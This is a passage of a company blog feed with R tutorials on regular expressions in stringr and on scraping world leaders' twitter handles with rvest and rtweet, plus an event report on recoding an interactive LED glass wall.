&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively we can use a group and pipe&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we don&amp;rsquo;t have to write surrounding expressions more than once. Of course there are other csv and ods files that we don&amp;rsquo;t want to collect. Now we need a way of specifying a block of letters. Up step the square parentheses and the asterisk…&lt;/p&gt;
&lt;h2 id="regex-square-parentheses-and-the-asterisk-"&gt;Regex: Square parentheses, &lt;code&gt;[]&lt;/code&gt;, and the asterisk, &lt;code&gt;*&lt;/code&gt;&lt;/h2&gt;
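&lt;p&gt;One detail worth a quick sketch before moving on: the group also controls what the pipe applies to. Without parentheses, the pipe splits the whole pattern in two. The vector &lt;code&gt;x&lt;/code&gt; here is made up for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;stringr&amp;#34;)

# Hypothetical file names
x = c(&amp;#34;a.csv&amp;#34;, &amp;#34;a.csv.bak&amp;#34;, &amp;#34;pods&amp;#34;, &amp;#34;a.ods&amp;#34;)

# No group: reads as (.csv anywhere) OR (ods at the end)
ungrouped = str_detect(x, &amp;#34;\\.csv|ods$&amp;#34;)
## [1] TRUE TRUE TRUE TRUE

# Group: a dot, then csv or ods, then the end of the string
grouped = str_detect(x, &amp;#34;\\.(csv|ods)$&amp;#34;)
## [1] TRUE FALSE FALSE TRUE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;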
&lt;p&gt;The square parentheses and asterisk. We can match a group of characters or digits using the square parentheses. Here I&amp;rsquo;m going to use a new function, &lt;code&gt;str_extract()&lt;/code&gt;. This does as it says on the tin, it &lt;em&gt;&lt;strong&gt;extracts&lt;/strong&gt;&lt;/em&gt; the parts of the text that match our pattern. For instance the last lower case letter in each element of the vector, if such a thing exists&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-z]$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;x&amp;#34; &amp;#34;s&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; NA &amp;#34;r&amp;#34; &amp;#34;s&amp;#34; &amp;#34;x&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice that one of the files ends with an upper case letter, so we get an &lt;code&gt;NA&lt;/code&gt;. To include this we add &amp;ldquo;A-Z&amp;rdquo; (to add digits we add 0-9, and most metacharacters can be written inside the square parentheses without escaping them)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;x&amp;#34; &amp;#34;s&amp;#34; &amp;#34;v&amp;#34; &amp;#34;v&amp;#34; &amp;#34;R&amp;#34; &amp;#34;r&amp;#34; &amp;#34;s&amp;#34; &amp;#34;x&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, this is obviously useless at the moment. This is where the asterisk comes in. The asterisk is what is called a quantifier. There are three other quantifiers (&lt;code&gt;+&lt;/code&gt;, &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;{}&lt;/code&gt;), but we won&amp;rsquo;t cover them here. A quantifier &lt;em&gt;&lt;strong&gt;quantifies&lt;/strong&gt;&lt;/em&gt; how many of the characters we want to match and the asterisk means we want 0 or more characters of the same form. For instance, we could now extract all of the file extensions if we wished to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_extract&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]*$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;xlsx&amp;#34; &amp;#34;ods&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;csv&amp;#34; &amp;#34;csv&amp;#34; &amp;#34;R&amp;#34; &amp;#34;r&amp;#34; &amp;#34;xls&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [11] &amp;#34;xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So we go backwards from the end of the line collecting all the characters until we hit a character that isn&amp;rsquo;t a lower or upper case letter. We can now use this to grab the group of letters preceding the file extensions for our task&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Obviously we still have some pesky files in there that we don&amp;rsquo;t want. Up step the… only joking! We now actually have all the tools to complete the task. The filenames we want take the form project-objects or project_objects, so we know that preceding that block of letters for &amp;ldquo;objects&amp;rdquo; we want either a dash or an underscore. We can use a group and pipe for this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project2-csv-specs.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We still have two pesky files sneaking in there. How do those two files and the three files we want differ? Well, the files we want all start with &amp;ldquo;project-&amp;rdquo; or &amp;ldquo;project_&amp;rdquo; whereas the other two don&amp;rsquo;t. We must also take note that &amp;ldquo;project&amp;rdquo; could have a capital &amp;ldquo;P&amp;rdquo;. We can combat that using a group!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;(P|p)roject(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we had a huge file list, we&amp;rsquo;d want to stop files such as &amp;ldquo;2Project_Trees.csv&amp;rdquo; filtering in as well. So we can just use the hat to specify the start of a line&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^(P|p)roject(\\_|\\-)[a-zA-Z]*\\.(csv|ods)$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34; &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Regular expressions are definitely a trade worth learning. They play a big role in modern data analytics. For a good table of metacharacters, quantifiers and useful regular expressions, see &lt;a href="https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expression-language-quick-reference" rel="external"&gt;this Microsoft page&lt;/a&gt;. Remember, in R you have to double escape metacharacters!&lt;/p&gt;
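&lt;p&gt;One caveat on the final pattern: because the asterisk allows zero letters, a name such as &amp;ldquo;project_.csv&amp;rdquo; would also match. The sketch below is one possible tightening, not the only way to do it. It swaps the asterisk for the &lt;code&gt;+&lt;/code&gt; quantifier (one or more) and writes the single-character choices as square parentheses. The vector &lt;code&gt;edge&lt;/code&gt; is made up for illustration.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;stringr&amp;#34;)

# Hypothetical edge cases alongside two names we do want
edge = c(
  &amp;#34;project_cars.ods&amp;#34;, &amp;#34;Project-houses.csv&amp;#34;,
  &amp;#34;project_.csv&amp;#34;, &amp;#34;2project_trees.csv&amp;#34;
)

# [Pp] and [_-] each match one character from the set;
# + requires at least one letter before the extension
pattern = &amp;#34;^[Pp]roject[_-][a-zA-Z]+\\.(csv|ods)$&amp;#34;
wanted = str_subset(edge, pattern)
## [1] &amp;#34;project_cars.ods&amp;#34; &amp;#34;Project-houses.csv&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;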
&lt;p&gt;That&amp;rsquo;s all for now. Cheers for reading!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Photo by &lt;a href="https://unsplash.com/@ioanroman29"&gt;Ioan Roman&lt;/a&gt; on &lt;a href="https://unsplash.com/s/photos/regular-expression"&gt;Unsplash&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ReCoding the Wall: Mixing art and code</title><link>https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/</link><pubDate>Wed, 11 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we often collaborate with the local community. This includes attending regional events such as those run by Creative FUSE, a partnership between the North East’s five universities. I recently attended an event at the National Glass Centre called &lt;a href="http://www.designnetworknorth.org/events/recoding-wall-digital-making-day/" rel="external"&gt;ReCoding the Wall&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This was an opportunity to investigate, experiment with, and modify a new artwork by Cate Watkinson and Colin Rennie. The artwork, Colour Field, is a large interactive LED wall currently on display at the National Glass Centre in Sunderland. Dominic Smith took &lt;a href="https://www.flickr.com/photos/dominicsmith/sets/72157689126146010/" rel="external"&gt;a few nice photos of the event&lt;/a&gt;, and Suzy O’Hara helped organise the event and first recommended it to me.&lt;/p&gt;
&lt;p&gt;The day began with coffee and an introduction to the two artists involved with the wall, an installation that had been on display in the &lt;a href="http://www.nationalglasscentre.com/about/whatson/details/?id=818" rel="external"&gt;National Glass Centre&lt;/a&gt;. Colin and Cate are both glass artists. Cate often works on larger installations, while Colin works with the more digital aspects of design, such as scanning organically shaped glass works at high resolution so that they can be reincorporated into new works with precision-cut metalwork.&lt;/p&gt;
&lt;img class="image-center" src="wall15.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;We spent the morning getting to know each other and looking at some of the interesting machinery you might not expect in a glass centre. This included a water jet CNC-type machine that can cut through metal sheets up to 30mm thick with very high accuracy, and a ceramic 3D printer which, thanks to the thicker nozzle required for liquid clay, actually prints faster than your standard ABS (plastic) printers (not counting the drying and firing time required :-)).&lt;/p&gt;
&lt;p&gt;After lunch we would get to play with the hardware and software that control the lighting of Colour Field, the 19x10x5 LED wall of glass and metal.&lt;/p&gt;
&lt;p&gt;Unfortunately, due to &lt;em&gt;The Beast from the East&lt;/em&gt;, this event had been postponed and we would not be hacking on the wall in situ in the gallery. Instead we travelled over the river to FabLab, part of a global network of digital fabrication spaces, where 3 of the panels would be waiting for our input.&lt;/p&gt;
&lt;p&gt;After a quick tour of the maker space (including a large laser cutter, vinyl cutters, CNC router, and full colour 3D printer!) we split into two groups to sketch out some possibilities of this wall.&lt;/p&gt;
&lt;img class="image-center" src="wall41.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;We had 3 of the 5 panels hooked up in the FabLab. This would still be plenty to work with, but much of the existing code was written with 5 panels in mind, and a significant portion of the rendering was done on the Arduino itself rather than on the computer with the attached Kinect sensor. To allow everyone to render images freely on the wall, the code on the Arduino-based LED controller would have to be modified significantly.&lt;/p&gt;
&lt;p&gt;Ultimately we worked together. One team created a sound-reactive visualisation and an emulator for the wall, while another worked on a text display suited to the wall&amp;rsquo;s relatively low resolution. Both teams worked on the Arduino code controlling each strip, removing references to the 5 panels and enabling arbitrary imagery to be sent over serial, which fully opened up the possibilities of what could be displayed. Although 3 hours was not quite enough to hook everything together, the emulator allowed everyone to easily demonstrate their ideas without needing to hook directly into the wall.&lt;/p&gt;
&lt;img class="image-center" src="wall57.jpg" style="width:450px; class:image-center"&gt;
&lt;p&gt;I will no doubt be taking some of the knowledge I picked up back home with me to make my own miniature wall. Expect to see a short blog post about what I make next quite soon!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/recoding-the-wall-mixing-art-and-code/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Which world leaders are twitter bots?</title><link>https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/</link><pubDate>Wed, 28 Mar 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#set-up"&gt;Set-up&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#getting-the-tweets"&gt;Getting the tweets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/which-world-leaders-are-twitter-bots/#are-world-leaders-actually-bots"&gt;Are world leaders actually bots?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="set-up"&gt;Set-up&lt;/h2&gt;
&lt;p&gt;Given that I do quite like twitter, I thought it would be a good idea to write about R’s interface to the twitter API: {rtweet}. We can install the package in the usual way. We’re also going to need the {tidyverse} for the analysis, {rvest} for some initial webscraping of twitter names, {lubridate} for some date manipulation and {stringr} (loaded as part of the {tidyverse}) for some minor text mining.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;rvest&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtweet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rvest&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2 id="getting-the-tweets"&gt;Getting the tweets&lt;/h2&gt;
&lt;p&gt;So, I could just write the names of twitter’s 10 most followed world leaders, but what would be the fun in that? We’re going to scrape them from &lt;a href="https://twiplomacy.com/ranking/the-50-most-followed-world-leaders-in-2017/" rel="external"&gt;twiplomacy&lt;/a&gt; using {rvest} and a chrome extension called selector gadget:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world_leaders &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_html&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://twiplomacy.com/ranking/the-50-most-followed-world-leaders-in-2017/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world_leaders &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_nodes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.ranking-entry .ranking-user-name&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;html_text&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_replace_all&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;\\t|\\n|@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(lead_r)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;realdonaldtrump&amp;#34; &amp;#34;pontifex&amp;#34; &amp;#34;narendramodi&amp;#34; &amp;#34;pmoindia&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;potus&amp;#34; &amp;#34;whitehouse&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The string inside &lt;code&gt;html_nodes()&lt;/code&gt; is a CSS selector found using selector gadget. See this &lt;a href="http://blog.rstudio.com/2014/11/24/rvest-easy-web-scraping-with-r/" rel="external"&gt;great tutorial&lt;/a&gt; on {rvest}, and for more on selector gadget read &lt;code&gt;vignette(&amp;quot;selectorgadget&amp;quot;)&lt;/code&gt;. Tabs (&lt;code&gt;\t&lt;/code&gt;), line breaks (&lt;code&gt;\n&lt;/code&gt;) and the leading &lt;code&gt;@&lt;/code&gt; are removed with &lt;code&gt;str_replace_all()&lt;/code&gt; from the {stringr} package.&lt;/p&gt;
&lt;p&gt;Now we can collect the twitter data using {rtweet}. We can use the function &lt;code&gt;lookup_users()&lt;/code&gt; to grab basic user info such as number of tweets, friends, favourites and followers. Analysing all 50 leaders at once would be a pain, so we’re only going to take the top 10 (&lt;em&gt;&lt;strong&gt;WARNING&lt;/strong&gt;&lt;/em&gt;: this could take a while).&lt;/p&gt;
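&lt;p&gt;If you would like to try the selector and the clean-up step without hitting the live site, the following is a minimal offline sketch. The HTML fragment is hand-written to mimic the class names in the selector above. It is an assumption about the page structure, not a copy of the real page.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;rvest&amp;#34;)
library(&amp;#34;stringr&amp;#34;)

# Hypothetical fragment: two ranking entries with padded twitter handles
html = paste0(
  &amp;#39;&amp;lt;div class=&amp;#34;ranking-entry&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;ranking-user-name&amp;#34;&amp;gt;\n\t@pontifex\n&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;&amp;#39;,
  &amp;#39;&amp;lt;div class=&amp;#34;ranking-entry&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;ranking-user-name&amp;#34;&amp;gt;\n\t@potus\n&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;&amp;#39;
)

# read_html() also accepts a literal HTML string
page = read_html(html)

handles = page %&amp;gt;%
  html_nodes(&amp;#34;.ranking-entry .ranking-user-name&amp;#34;) %&amp;gt;%
  html_text() %&amp;gt;%
  str_replace_all(&amp;#34;\\t|\\n|@&amp;#34;, &amp;#34;&amp;#34;)  # strip tabs, newlines and the @
handles
## [1] &amp;#34;pontifex&amp;#34; &amp;#34;potus&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;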
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;lookup_users&lt;/span&gt;(lead_r[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_info
